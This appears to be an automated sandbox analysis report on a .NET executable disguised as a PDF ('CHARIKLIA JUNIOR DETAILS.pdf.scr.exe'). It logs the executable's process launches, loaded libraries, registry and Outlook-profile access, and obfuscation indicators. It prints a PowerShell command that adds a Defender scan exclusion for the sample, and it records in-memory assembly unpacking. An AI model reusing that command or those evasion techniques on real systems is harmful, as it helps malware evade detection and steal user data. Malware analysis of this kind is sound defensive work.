                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1397955965.0000000000822000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO [dbo].[CREDIT_PLAN] ([CREDIT_ID], [MATURITY_DATE], [MATURITY_SUM], [MATURITY_NOTE], [MODIF_DATE]) VALUES (@CREDIT_ID, @MATURITY_DATE, @MATURITY_SUM, @MATURITY_NOTE, @MODIF_DATE);
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1397955965.0000000000822000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE], [INTEREST]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE, @INTEREST);
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1397955965.0000000000822000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE [dbo].[Login] SET [User_id] = @User_id, [User_pass] = @User_pass WHERE (([User_id] = @Original_User_id) AND ([User_pass] = @Original_User_pass));
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1397955965.0000000000822000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE [dbo].[CREDIT_PLAN] SET [CREDIT_ID] = @CREDIT_ID, [MATURITY_DATE] = @MATURITY_DATE, [MATURITY_SUM] = @MATURITY_SUM, [MATURITY_NOTE] = @MATURITY_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([MATURITY_ID] = @Original_MATURITY_ID) AND ((@IsNull_CREDIT_ID = 1 AND [CREDIT_ID] IS NULL) OR ([CREDIT_ID] = @Original_CREDIT_ID)) AND ([MATURITY_DATE] = @Original_MATURITY_DATE) AND ([MATURITY_SUM] = @Original_MATURITY_SUM) AND ((@IsNull_MATURITY_NOTE = 1 AND [MATURITY_NOTE] IS NULL) OR ([MATURITY_NOTE] = @Original_MATURITY_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1397955965.0000000000822000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO [dbo].[PROD_PERIODS] ([PROD_CODE], [PROD_PERIOD]) VALUES (@PROD_CODE, @PROD_PERIOD);
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1397955965.0000000000822000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE [dbo].[INTEREST] SET [PROD_CODE] = @PROD_CODE, [PROD_PERIOD] = @PROD_PERIOD, [SUM_FROM] = @SUM_FROM, [SUM_TO] = @SUM_TO WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_PERIOD] = @Original_PROD_PERIOD) AND ([SUM_FROM] = @Original_SUM_FROM) AND ([SUM_TO] = @Original_SUM_TO));
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1397955965.0000000000822000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE [dbo].[CREDIT] SET [CREDIT_NO] = @CREDIT_NO, [CREDIT_DATE] = @CREDIT_DATE, [CREDIT_PERIOD] = @CREDIT_PERIOD, [CREDIT_END_DATE] = @CREDIT_END_DATE, [CREDIT_BEGIN_DATE] = @CREDIT_BEGIN_DATE, [CLIENT_ID] = @CLIENT_ID, [PROD_CODE] = @PROD_CODE, [CREDIT_SUM] = @CREDIT_SUM, [CREDIT_NOTE] = @CREDIT_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([CREDIT_ID] = @Original_CREDIT_ID) AND ([CREDIT_NO] = @Original_CREDIT_NO) AND ((@IsNull_CREDIT_DATE = 1 AND [CREDIT_DATE] IS NULL) OR ([CREDIT_DATE] = @Original_CREDIT_DATE)) AND ([CREDIT_PERIOD] = @Original_CREDIT_PERIOD) AND ((@IsNull_CREDIT_END_DATE = 1 AND [CREDIT_END_DATE] IS NULL) OR ([CREDIT_END_DATE] = @Original_CREDIT_END_DATE)) AND ((@IsNull_CREDIT_BEGIN_DATE = 1 AND [CREDIT_BEGIN_DATE] IS NULL) OR ([CREDIT_BEGIN_DATE] = @Original_CREDIT_BEGIN_DATE)) AND ([CLIENT_ID] = @Original_CLIENT_ID) AND ((@IsNull_PROD_CODE = 1 AND [PROD_CODE] IS NULL) OR ([PROD_CODE] = @Original_PROD_CODE)) AND ([CREDIT_SUM] = @Original_CREDIT_SUM) AND ((@IsNull_CREDIT_NOTE = 1 AND [CREDIT_NOTE] IS NULL) OR ([CREDIT_NOTE] = @Original_CREDIT_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1397955965.0000000000822000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE [dbo].[CREDIT_PRODUCT] SET [PROD_NAME] = @PROD_NAME, [PROD_ACTIVE] = @PROD_ACTIVE, [PROD_SUM_FROM] = @PROD_SUM_FROM, [PROD_SUM_TO] = @PROD_SUM_TO, [MODIF_DATE] = @MODIF_DATE WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_NAME] = @Original_PROD_NAME) AND ([PROD_ACTIVE] = @Original_PROD_ACTIVE) AND ([PROD_SUM_FROM] = @Original_PROD_SUM_FROM) AND ([PROD_SUM_TO] = @Original_PROD_SUM_TO) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1397955965.0000000000822000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE);
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeReversingLabs: Detection: 55%
                  Source: unknownProcess created: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess created: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess created: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, InnerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, oTWR4jX5WAldfeNr9l.cs.Net Code: W3a5x9yJDD System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_0115DB84 pushfd ; ret 0_2_0115DB89
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_02F20C77 push edi; retf 5_2_02F20C7A
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeStatic PE information: section name: .text entropy: 7.528842413573355
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, bKajDlMRoWfFMCaojU.csHigh entropy of concatenated method names: 'UOsDt5k7Xi', 'CrZDep1ihZ', 'zAnDD4SuGB', 'TBYDoNkqti', 'ud1D3U3Uhb', 'ERfDnsuMch', 'Dispose', 'I5a1E3txgm', 'rBa1IlpesI', 'DFB1NgC42a'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, aoZ5ZOdHfAY3VlgJLe.csHigh entropy of concatenated method names: 'FysscY7vn4', 'V36shH732u', 'Vuysx5d00c', 'sV4sZIu2l0', 'f6Gs24OuCm', 'vC0sYGrlV8', 'CjDs0mMtVp', 'sUQsf2AYak', 'EKJsSDWey7', 'LTIskiyN41'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, RhFK4wgMyLLuTnij1G.csHigh entropy of concatenated method names: 'ToString', 'VE3OWZc5gx', 'v6IOaRYGtB', 'igkO6xYJNo', 'lNjOjX9VOi', 'f4fOQpDu9G', 'jH1OCxDKrw', 'CYpOr9uoEo', 'cbeO4l4TUA', 'wWDOd8Wj92'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, mO0cHCfe6EeD0PN2nv.csHigh entropy of concatenated method names: 'Hq9IKMdLgy', 'GbaIFDcbH9', 'GAnIgPOTGB', 'KY5ImANMw0', 'InNIu1tpnM', 'QQVI8slqsj', 'WT7IMG4jDL', 'RsYI90RqYZ', 'KssILQaIA5', 'AioIRjdq8A'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, IkAS7eRqcx3a3kX44C.csHigh entropy of concatenated method names: 'R4UPNn7VgR', 'W2TPyUBlyp', 'HoBPJNAS19', 'ielPsLbyOX', 'J2lPDyexZf', 'i72PXiCBdD', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, dkhx2UU75UPo3M4pIK.csHigh entropy of concatenated method names: 'pLcxRCNQ7', 'ynKZS1TjS', 'bx5Y9PEZL', 'l4Z0PQNKF', 'kAeSkBA54', 'omqkueQNX', 'zkaEcsMEU9ylA05ogY', 'nPrjxUkcAEGyp6n573', 'Dd11TpWJv', 'EWtPmZ9vq'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, kbfO8Pbnl4gKhe2ODL.csHigh entropy of concatenated method names: 'T2m7fgiT4r', 'a5s7Sk9IU5', 'ayq7p8xasj', 'xQN7aBPDFF', 'WxL7jyUIAP', 'N787QiPH5c', 'Wwp7r0Eyeo', 'lvU74OYvT4', 'lCl7wcewuo', 'Poi7W2WYZj'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, aFf7qbAAj88XSIi81E1.csHigh entropy of concatenated method names: 'YNZPRDtXp9', 'yKQPzlQR3P', 'K4woHEdKQl', 'PIVoAENdjg', 'o27oURh44e', 'rynoqhU708', 'IYRo5wVSjm', 'FfuoiqRrgK', 'YlSoE2kYCf', 'dTmoIx1eC5'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, HqPboYL2pr4r8kuGLp.csHigh entropy of concatenated method names: 'nK9DpY2HDX', 'eG0DakZEXi', 'TwND6SoSNt', 'doADj11ElZ', 'NgZDQwJLkk', 'chNDCmOeN5', 'DgaDrxiwLB', 'jfjD4lDu3C', 'NAZDd1jQxS', 'q56DwBofBq'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, HcmjCNrorsuqgIpjA7.csHigh entropy of concatenated method names: 'seqsE37BIe', 'dyQsNQ18uL', 'A5WsJV8j9K', 'qGOJR4PhuQ', 'bMcJzlsHuG', 'WFZsHiuJGh', 'CgZsAhukX4', 'T19sU8TvyK', 'HLssqEMUhi', 'z9Ds5nBjt2'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, JkaYIP88Qn30GQ1v1A.csHigh entropy of concatenated method names: 'Pgxe9yOkjs', 'mQmeRGd046', 'hFA1HldY7V', 'omk1AfRROe', 'GFSeWYLLxl', 'opueT6ayd5', 'EfVebfhHlD', 'Np9eKjAEYX', 'vGteF15Vv8', 'BcRegUHyEl'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, fdPwDTSIaeaio0i1kO.csHigh entropy of concatenated method names: 'FQeNZPfHag', 'RDXNYrLnbD', 'vDmNfCENp9', 'gWgNSP6uP7', 'kqXNtt6jKl', 'iaTNOPHIk6', 'U4gNeB5E07', 'kQHN1lWNq7', 'xPQNDdlTil', 'u7ZNPo2Uu6'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, CltvPrpNjb1VckZWnp.csHigh entropy of concatenated method names: 'hE1Ji7UcNc', 'vBdJI5BlfR', 'iJYJyxt3ev', 'umkJsUZLWT', 'c2VJXKC3hq', 'JGSyuZ796F', 'PtZy8JuJYs', 'kiRyMw623L', 'ROFy9EV8ky', 'qDiyLEpTpg'
